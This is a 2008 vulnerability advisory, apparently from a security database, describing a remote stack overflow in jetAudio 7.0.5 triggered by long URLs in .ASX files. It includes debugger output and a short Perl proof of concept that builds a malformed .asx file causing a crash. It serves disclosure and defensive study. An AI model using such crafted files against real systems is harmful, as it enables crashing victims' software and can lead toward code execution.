jetAudio <= 7.0.5 (.ASX) Remote Stack Overflow

2008.02.13
Credit: laurent gaffi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Application: jetAudio 7.0.5 (.ASX) Remote Stack Overflow Web Site: http://www.cowonamerica.com/download/ Platform: Windows Bug:Remote Stack Overflow Extension: ASX special condition: none ------------------------------------------------------- 1) Introduction 2) Bug 3) Proof of concept 4) Credits =========== 1) Introduction =========== A nice introduction to jetaudio can be found : http://www.cowonamerica.com/products/jetaudio/ ====== 2) Bug ====== When parsing an asx file with a long URL a stack overflow occurs. ===== 3)Proof of concept ===== Proof of concept example : An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program Here's the debugger output: Access violation - code c0000005 eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141 edi=00000001 eip=00441dad esp=0012cf3c ebp=00000001 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 JetAudio!CxImage::`copy constructor closure'+0x1109d: 00441dad 8b06 mov eax,[esi] ds:0023:41414141=???????? Here's the the Poc : #!/usr/local/bin/perl use strict; use warnings; my $file="myfile.asx"; my $payload = "A" x 1096; open( $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE "http://".$payload; close($FILE); print "$file has been created \n"; ===== 5)Credits ===== laurent gaffi laurent.gaffie{remove_this}[at]gmail[dot]com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top